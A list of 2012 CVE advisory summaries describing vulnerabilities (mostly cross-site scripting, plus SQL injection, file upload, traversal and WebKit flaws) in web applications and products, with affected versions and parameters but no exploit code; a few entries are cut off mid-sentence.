[CVE-2012-1240] Cross-site scripting (XSS) vulnerability in the RECRUIT Dokodemo Rikunabi 2013 extension before 1.0.1 for Google Chrome allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1238] Session fixation vulnerability in SENCHA SNS before 1.0.2 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2012-1235] Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0235.
[CVE-2012-1234] SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0234.
[CVE-2012-1224] Cross-site scripting (XSS) vulnerability in system/classes/login.php in ContentLion Alpha 1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-1219] Multiple cross-site scripting (XSS) vulnerabilities in freelancerKit 2.35 allow remote attackers to inject arbitrary web script or HTML via the (1) ticket parameter to tickets.php, (2) title parameter to notes.php, or (3) task parameter to todo.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-1217] Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web Portal 2.2 allow remote attackers to inject arbitrary web script or HTML via the team parameter to (1) prospects.php, (2) prospect.php, or (3) team.php.
[CVE-2012-1215] Cross-site scripting (XSS) vulnerability in the Add friends module in the Yoono extension before 7.7.8 for Firefox allows remote attackers to inject arbitrary web script or HTML via the create field in a "Create a group" action.
[CVE-2012-1214] Cross-site scripting (XSS) vulnerability in the Add friends module in Yoono Desktop Application before 1.8.21 allows remote attackers to inject arbitrary web script or HTML via the create field in a "Create a group" action.
[CVE-2012-1213] Cross-site scripting (XSS) vulnerability in zimbra/h/calendar in Zimbra Web Client allows remote attackers to inject arbitrary web script or HTML via the view parameter.
[CVE-2012-1212] Cross-site scripting (XSS) vulnerability in the smwfOnSfSetTargetName function in extensions/SMWHalo/includes/SMW_Initialize.php in Semantic Enterprise Wiki (SMW+) 1.5.6, 1.6.0_2 and earlier allows remote attackers to inject arbitrary web script or HTML via the target parameter to index.php/Special:FormEdit. NOTE: some of these details are obtained from third party information.
[CVE-2012-1211] Cross-site scripting (XSS) vulnerability in pfile/kommentar.php in Powie pFile 1.02 allows remote attackers to inject arbitrary web script or HTML via the filecat parameter.
[CVE-2012-1209] Cross-site scripting (XSS) vulnerability in backend/core/engine/base.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter.
[CVE-2012-1208] Multiple cross-site scripting (XSS) vulnerabilities in backend/core/engine/base.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) report parameter to blog/settings or (2) error parameter to users/index.
[CVE-2012-1196] Directory traversal vulnerability in the VulCore web service (WSVulnerabilityCore/VulCore.asmx) in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to delete arbitrary files via a .. (dot dot) in the filename parameter in a SetTaskLogByFile SOAP request.
[CVE-2012-1195] Unrestricted file upload vulnerability in andesk/managementsuite/core/core.anonymous/ServerSetup.asmx in the ServerSetup web service in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to execute arbitrary code by uploading a file with an executable extension via a PutUpdateFileCore command in a RunAMTCommand SOAP request, then accessing the file via a direct request to the file in the web root.
[CVE-2012-1190] Cross-site scripting (XSS) vulnerability in the replication-setup functionality in js/replication.js in phpMyAdmin 3.4.x before 3.4.10.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted database name.
[CVE-2012-1188] Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before 3.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) type or (2) querystring parameters to private/en/error or (3) name parameter to private/en/locale/index.
[CVE-2012-1167] The JBoss Server in JBoss Enterprise Application Platform 5.1.x before 5.1.2 and 5.2.x before 5.2.2, Web Platform before 5.1.2, BRMS Platform before 5.3.0, and SOA Platform before 5.3.0, when the server is configured to use the JaccAuthorizationRealm and the ignoreBaseDecision property is set to true on the JBossWebRealm, does not properly check the permissions created by the WebPermissionMapping class, which allows remote authenticated users to access arbitrary applications.
[CVE-2012-1117] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.0 and 2.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1113] Multiple cross-site scripting (XSS) vulnerabilities in the administration subsystem in Gallery 2 before 2.3.2 and 3 before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1110] Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) email, (3) email2, (4) f17_zip, or (5) agree parameter to join.php.
[CVE-2012-1103] emacs/notmuch-mua.el in Notmuch before 0.11.1, when using the Emacs interface, allows user-assisted remote attackers to read arbitrary files via crafted MML tags, which are not properly quoted in an email reply and can cause the files to be attached to the message.
[CVE-2012-1099] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_options_helper.rb in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving certain generation of OPTION elements within SELECT elements.
[CVE-2012-1098] Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving a SafeBuffer object that is manipulated through certain methods.
[CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
[CVE-2012-1087] Cross-site scripting (XSS) vulnerability in the Post data records to facebook (bc_post2facebook) extension before 0.2.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1086] Cross-site scripting (XSS) vulnerability in the UrlTool (aeurltool) extension 0.1.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1084] Cross-site scripting (XSS) vulnerability in the BE User Switch (beuserswitch) extension 0.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1082] Cross-site scripting (XSS) vulnerability in the Terminal PHP Shell (terminal) extension 0.3.2 and earlier for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1081] Cross-site scripting (XSS) vulnerability in the Yet another Google search (ya_googlesearch) extension before 0.3.10 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1080] Cross-site scripting (XSS) vulnerability in the Euro Calculator (skt_eurocalc) extension 0.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1079] Unspecified vulnerability in the Webservices for TYPO3 (typo3_webservice) extension before 0.3.8 for TYPO3 allows remote authenticated users to execute arbitrary code via unknown vectors.
[CVE-2012-1076] Cross-site scripting (XSS) vulnerability in the Documents download (rtg_files) extension before 1.5.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1073] Cross-site scripting (XSS) vulnerability in the Category-System (toi_category) extension 0.6.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1070] Cross-site scripting (XSS) vulnerability in the Modern FAQ (irfaq) extension 1.1.2 and other versions before 1.1.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to the "return url parameter."
[CVE-2012-1069] Cross-site scripting (XSS) vulnerability in module/kb/search_word in the search module in lknSupport allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-1068] Cross-site scripting (XSS) vulnerability in the rc_ajax function in core.php in the WP-RecentComments plugin before 2.0.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter, related to AJAX paging.
[CVE-2012-1066] Cross-site scripting (XSS) vulnerability in the template module in SmartyCMS 0.9.4 allows remote attackers to inject arbitrary web script or HTML via the title bar.
[CVE-2012-1064] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before 5.2SP1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1062] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 9.x and 10.x allow remote attackers to inject arbitrary web script or HTML via the (1) period parameter to showHistoryData.do
[CVE-2012-1060] Multiple cross-site scripting (XSS) vulnerabilities in revisioning_theme.inc in the Taxonomy module in the Revisioning module 6.x-3.13 and other versions before 6.x-3.14 for Drupal allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) tags or (2) term parameters.
[CVE-2012-1059] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Cart/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, as demonstrated using the "Front" field in the shirt module.
[CVE-2012-1049] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ADManager Plus 5.2 Build 5210 allow remote attackers to inject arbitrary web script or HTML via the (1) domainName parameter to jsp/AddDC.jsp or (2) operation parameter to DomainConfig.do.
[CVE-2012-1048] Cross-site scripting (XSS) vulnerability in communityplusplus/www/administrator.php in eFront Community++ edition 3.6.10, and possibly other editions, allows remote attackers to inject arbitrary web script or HTML via the filter parameter.
[CVE-2012-1046] Cross-site scripting (XSS) vulnerability in TM1 Web in IBM Cognos TM1 9.5.2 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0696.
[CVE-2012-1039] Multiple cross-site scripting (XSS) vulnerabilities in Dotclear before 2.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) login_data parameter to admin/auth.php
[CVE-2012-1038] Cross-site scripting (XSS) vulnerability in the WebAAA login functionality (wba_login.html) in Juniper Networks Mobility System Software (MSS) 7.6.x before 7.6.3, 7.7.x before 7.7.1, 7.5.x before 7.5.3, and other unspecified versions before 7.4 and 7.3 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter name.
[CVE-2012-1036] Cross-site scripting (XSS) vulnerability in the telerik HTML editor in DotNetNuke before 5.6.4 and 6.x before 6.1.0 allows remote attackers to inject arbitrary web script or HTML via a message.
[CVE-2012-1035] AdaCore Ada Web Services (AWS) before 2.10.2 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
[CVE-2012-1031] Unspecified vulnerability in EPiServer CMS 5 and 6 through 6R2, in certain configurations using Forms Authentication, allows remote authenticated users to obtain WebAdmins access by leveraging Edit Mode privileges, a different vulnerability than CVE-2011-3416 and CVE-2011-3417.
[CVE-2012-1030] Cross-site scripting (XSS) vulnerability in DotNetNuke 6.x through 6.0.2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted URL containing text that is used within a modal popup.
[CVE-2012-1028] Cross-site scripting (XSS) vulnerability in bin/index.php in SimpleGroupware 0.742 and other versions before 0.743 allows remote attackers to inject arbitrary web script or HTML via the export parameter.
[CVE-2012-1027] Cross-site scripting (XSS) vulnerability in account-closed.tcl in ]project-open[ (aka ]po[) 3.4.x, 3.5.0.1-2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the message parameter to register/account-closed.
[CVE-2012-1023] Open redirect vulnerability in admin/index.php in 4images 1.7.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter.
[CVE-2012-1021] Cross-site scripting (XSS) vulnerability in admin/categories.php in 4images 1.7.10 allows remote attackers to inject arbitrary web script or HTML via the cat_parent_id parameter in an addcat action.
[CVE-2012-1020] Multiple cross-site scripting (XSS) vulnerabilities in login.php in NexorONE Online Banking allow remote attackers to inject arbitrary web script or HTML via the (1) visitor_language parameter to register.php or (2) message parameter.
[CVE-2012-1019] Multiple cross-site scripting (XSS) vulnerabilities in XWiki Enterprise 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) XWiki.XWikiComments_comment parameter to xwiki/bin/commentadd/Main/WebHome, (2) XWiki.XWikiUsers_0_company parameter when editing a user profile, or (3) projectVersion parameter to xwiki/bin/view/DownloadCode/DownloadFeedback. NOTE: some of these details are obtained from third party information.
[CVE-2012-1018] Cross-site scripting (XSS) vulnerability in includes/convert.php in D-Mack Media Currency Converter (mod_currencyconverter) module 1.0.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the from parameter.
[CVE-2012-1011] actions.php in the AllWebMenus plugin 1.1.8 for WordPress allows remote attackers to bypass intended access restrictions to upload and execute arbitrary PHP code by setting the HTTP_REFERER to a certain value, then uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory.
[CVE-2012-1010] Unrestricted file upload vulnerability in actions.php in the AllWebMenus plugin before 1.1.8 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory.
[CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
[CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
[CVE-2012-1005] Multiple cross-site scripting (XSS) vulnerabilities in Sphinx Software Mobile Web Server 3.1.2.47 allow remote attackers to inject arbitrary web script or HTML via the comment parameter to a blog, as demonstrated using (1) Blog/MyFirstBlog.txt or (2) Blog/AboutSomething.txt.
[CVE-2012-1004] Multiple cross-site scripting (XSS) vulnerabilities in UI/Register.pm in Foswiki before 1.1.5 allow remote authenticated users with CHANGE privileges to inject arbitrary web script or HTML via the (1) text, (2) FirstName, (3) LastName, (4) OrganisationName, (5) OrganisationUrl, (6) Profession, (7) Country, (8) State, (9) Address, (10) Location, (11) Telephone, (12) VoIP, (13) InstantMessagingIM, (14) Email, (15) HomePage, or (16) Comment parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-1000] Multiple cross-site scripting (XSS) vulnerabilities in LEPTON 1.1.3 and other versions before 1.1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) message parameter to admins/login/forgot/index.php, or the (2) display_name or (3) email parameter to account/preferences.php.
[CVE-2012-0995] Multiple cross-site scripting (XSS) vulnerabilities in ZENphoto 1.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter in an external action to zp-core/admin.php, (2) PATH_INFO to an unspecified URL, as demonstrated using /1/, (3) PATH_INFO to zp-core/admin.php, or (4) album parameter to zp-core/admin-edit.php.
[CVE-2012-0992] interface/fax/fax_dispatch.php in OpenEMR 4.1.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the file parameter.
[CVE-2012-0989] Cross-site scripting (XSS) vulnerability in OneOrZero AIMS 2.8.0 Trial Edition build231211 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2012-0988] Multiple cross-site scripting (XSS) vulnerabilities in config/dmsDefaults.php in KnowledgeTree 3.7.0.2 and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) login.php, (2) admin.php, or (3) preferences.php.
[CVE-2012-0986] Multiple cross-site scripting (XSS) vulnerabilities in ImpressCMS 1.2.x before 1.2.7 Final and 1.3.x before 1.3.1 Final allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) notifications.php, (2) modules/system/admin/images/browser.php, and (3) modules/content/admin/content.php.
[CVE-2012-0979] Cross-site scripting (XSS) vulnerability in TWiki allows remote attackers to inject arbitrary web script or HTML via the organization field in a profile, involving (1) registration or (2) editing of the user.
[CVE-2012-0976] Cross-site scripting (XSS) vulnerability in admin/EditForm in SilverStripe 2.4.6 allows remote authenticated users with Content Authors privileges to inject arbitrary web script or HTML via the Title parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-0975] Cross-site scripting (XSS) vulnerability in misc.php in Image Hosting Script DPI 1.0, 1.3, and earlier allows remote attackers to inject arbitrary web script or HTML via the showseries parameter.
[CVE-2012-0974] Multiple cross-site scripting (XSS) vulnerabilities in the getParam function in oc-includes/osclass/core/Params.php in OSClass before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) sCity, (2) sPattern, (3) sPriceMax, and (4) sPriceMin parameters in a search action to index.php.
[CVE-2012-0958] content/unity-api.js in the unity-firefox-extension extension 2.4.1 for Firefox exposes the toDataURL function in an API call, which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted webpage.
[CVE-2012-0956] ubiquity-slideshow-ubuntu before 58.2, during installation, allows remote man-in-the-middle attackers to execute arbitrary web script or HTML and read arbitrary files via a crafted attribute in the <a> tag of a Twitter feed.
[CVE-2012-0936] Cross-site scripting (XSS) vulnerability in web/springframework/security/SecurityAuthenticationEventOnmsEventBuilder.java in OpenNMS 1.8.x before 1.8.17, 1.9.93 and earlier, and 1.10.x before 1.10.1 allows remote attackers to inject arbitrary web script or HTML via the Username field, related to login.
[CVE-2012-0933] Multiple cross-site scripting (XSS) vulnerabilities in Acidcat CMS 3.5.1, 3.5.2, 3.5.6, and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin_colors.asp, (2) admin_config.asp, and (3) admin_cat_add.asp in admin/.
[CVE-2012-0932] Cross-site scripting (XSS) vulnerability in admin/login.php in Lead Capture Page System allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2012-0930] Cross-site scripting (XSS) vulnerability in Schneider Electric Modicon Quantum PLC allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0919] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 through 03-00-04, and possibly other versions before 03-00-06, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0917] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Analyzer 02-01, 02-51 through 02-51-01, and 02-53 through 02-53-02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0914] Cross-site scripting (XSS) vulnerability in display_renderers/panels_renderer_editor.class.php in the admin view in the Panels module 6.x-2.x before 6.x-3.10 and 7.x-3.x before 7.x-3.0 for Drupal allows remote authenticated users with certain privileges to inject arbitrary web script or HTML via the Region title.
[CVE-2012-0912] SQL injection vulnerability in Stoneware webNetwork before 6.0.8.0 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2012-0909] Cross-site scripting (XSS) vulnerability in Horde_Form in Horde Groupware Webmail Edition before 4.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to email verification. NOTE: Some of these details are obtained from third party information.
[CVE-2012-0908] Cross-site scripting (XSS) vulnerability in logout.php in SimpleSAMLphp 1.8.1 and possibly other versions before 1.8.2 allows remote attackers to inject arbitrary web script or HTML via the link_href parameter.
[CVE-2012-0907] Directory traversal vulnerability in the web player in NeoAxis NeoAxis web player 1.4 and earlier allows user-assisted remote attackers to write arbitrary files via a .. (dot dot) in a filename in the neoaxis_web_application_win32.zip ZIP archive.
[CVE-2012-0903] Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Desktop 7.1.2 b10978 allow remote attackers to inject arbitrary web script or HTML via the (1) Username or (2) MailBox Name.
[CVE-2012-0901] Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
[CVE-2012-0900] Multiple cross-site scripting (XSS) vulnerabilities in Beehive Forum 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) forum/register.php or (2) forum/logon.php.
[CVE-2012-0899] Cross-site scripting (XSS) vulnerability in referencement/sites_inscription.php in Annuaire PHP allows remote attackers to inject arbitrary web script or HTML via the url parameter and possibly the nom parameter.
[CVE-2012-0895] Cross-site scripting (XSS) vulnerability in map/map.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map parameter.
[CVE-2012-0878] Paste Script 1.7.5 and earlier does not properly set group memberships during execution with root privileges, which might allow remote attackers to bypass intended file-access restrictions by leveraging a web application that uses the local filesystem.
[CVE-2012-0874] The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a "second layer of authentication," or when used in conjunction with other vulnerabilities that bypass this second layer.
[CVE-2012-0873] Multiple cross-site scripting (XSS) vulnerabilities in Boonex Dolphin before 7.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) explain parameter to explanation.php or the (2) photos_only, (3) online_only, or (4) mode parameters to viewFriends.php.
[CVE-2012-0872] Multiple cross-site scripting (XSS) vulnerabilities in OxWall 1.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) captchaField, (2) email, (3) form_name, (4) password, (5) realname, (6) repeatPassword, or (7) username parameters to Oxwall/join
[CVE-2012-0869] Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File EXchange (F*EX, aka fex) before 20120215 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2012-0865] Multiple open redirect vulnerabilities in CubeCart 3.0.20 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) r parameter to switch.php or (2) goto parameter to admin/login.php.
[CVE-2012-0846] Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the Location variable.
[CVE-2012-0834] Cross-site scripting (XSS) vulnerability in lib/QueryRender.php in phpLDAPadmin 1.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the base parameter in a query_engine action to cmd.php.
[CVE-2012-0822] Cross-site scripting (XSS) vulnerability in Joomla! 1.6 and 1.7.x before 1.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0820.
[CVE-2012-0820] Cross-site scripting (XSS) vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0822.
[CVE-2012-0797] The webservices functionality in Moodle 2.0.x before 2.0.7, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 allows remote authenticated users to bypass the deleted status and continue using a server via a token.
[CVE-2012-0791] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP before 5.0.18 and Horde Groupware Webmail Edition before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) composeCache, (2) rtemode, or (3) filename_* parameters to the compose page
[CVE-2012-0790] Cross-site scripting (XSS) vulnerability in smokeping_cgi in Smokeping 2.4.2, 2.6.6, and other versions before 2.6.7 allows remote attackers to inject arbitrary web script or HTML via the displaymode parameter.
[CVE-2012-0782] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dbhost, (2) dbname, or (3) uname parameter. NOTE: the vendor disputes the significance of this issue
[CVE-2012-0765] Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp 8 and 9 for Word allow remote attackers to inject arbitrary web script or HTML via a crafted URL, related to certain .htm files in (1) template_stock and (2) template_csh directories.
[CVE-2012-0746] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0744] IBM Rational ClearQuest 7.1.x through 7.1.2.7 and 8.x through 8.0.0.3 allows remote attackers to obtain potentially sensitive information via a request to a (1) snoop, (2) hello, (3) ivt/, (4) hitcount, (5) HitCount.jsp, (6) HelloHTMLError.jsp, (7) HelloHTML.jsp, (8) HelloVXMLError.jsp, (9) HelloVXML.jsp, (10) HelloWMLError.jsp, (11) HelloWML.jsp, or (12) cqweb/j_security_check sample script.
[CVE-2012-0740] Cross-site scripting (XSS) vulnerability in the Web Admin Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.22 and 6.3 before 6.3.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0737] Cross-site scripting (XSS) vulnerability in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0736] IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not properly create scan jobs, which allows remote attackers to execute arbitrary code via a crafted web site.
[CVE-2012-0720] Cross-site scripting (XSS) vulnerability in the Integration Solution Console in the Administration Console in IBM WebSphere Application Server 7.0 before 7.0.0.23 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2012-0719] Cross-site scripting (XSS) vulnerability in IBM Tivoli Endpoint Manager (TEM) 8 before 8.2 patch 3 allows remote attackers to inject arbitrary web script or HTML via the ScheduleParam parameter to the webreports program.
[CVE-2012-0717] IBM WebSphere Application Server 7.0 before 7.0.0.23, when a certain SSLv2 configuration with client authentication is used, allows remote attackers to bypass X.509 client-certificate authentication via unspecified vectors.
[CVE-2012-0716] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server 7.0 before 7.0.0.23 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0715] Cross-site scripting (XSS) vulnerability in the Gantt applet viewer in IBM Tivoli Change and Configuration Management Database (CCMDB) 7.2.1 and IBM ILOG JViews Gantt allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0708] Heap-based buffer overflow in the Ole API in the CQOle ActiveX control in cqole.dll in IBM Rational ClearQuest 7.1.1 before 7.1.1.9, 7.1.2 before 7.1.2.6, and 8.0.0 before 8.0.0.2 allows remote attackers to execute arbitrary code via a crafted web page that leverages a RegisterSchemaRepoFromFileByDbSet function-prototype mismatch.
[CVE-2012-0707] Cross-site scripting (XSS) vulnerability in IBM WebSphere Lombardi Edition 7.2 allows remote attackers to inject arbitrary web script or HTML via crafted text input to a coach that is configured with a document attachment control section.
[CVE-2012-0703] Open redirect vulnerability in Information Services Framework (ISF) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-0696] Multiple cross-site scripting (XSS) vulnerabilities in the Executive Viewer (EV) in IBM Cognos TM1 before 9.5 FP1 allow remote attackers to inject arbitrary web script or HTML via unspecified requests to (1) aspnet_client or (2) evserver/createcontrol.js.
[CVE-2012-0690] TIBCO Spotfire Web Application, Web Player Application, Automation Services Application, and Analytics Client Application in Spotfire Analytics Server before 10.1.2
[CVE-2012-0688] Cross-site scripting (XSS) vulnerability in TIBCO ActiveMatrix Platform in TIBCO Silver Fabric ActiveMatrix Service Grid Distribution 3.1.3, Service Grid and Service Bus 3.x before 3.1.5, BusinessWorks Service Engine 5.9.x before 5.9.3, and BPM before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0683] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-0682] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-0678] Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML via a feed:// URL.
[CVE-2012-0676] WebKit in Apple Safari before 5.1.7 does not properly track state information during the processing of form input, which allows remote attackers to fill in form fields on the pages of arbitrary web sites via unspecified vectors.
[CVE-2012-0674] Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the location bar's URL via a crafted web site.
[CVE-2012-0672] WebKit in Apple iOS before 5.1.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
[CVE-2012-0648] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2012-0647] WebKit in Apple Safari before 5.1.4 does not properly handle redirects in conjunction with HTTP authentication, which might allow remote web servers to capture credentials by logging the Authorization HTTP header.
[CVE-2012-0640] WebKit in Apple Safari before 5.1.4 does not properly implement "From third parties and advertisers" cookie blocking, which makes it easier for remote web servers to track users via a cookie.
[CVE-2012-0639] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
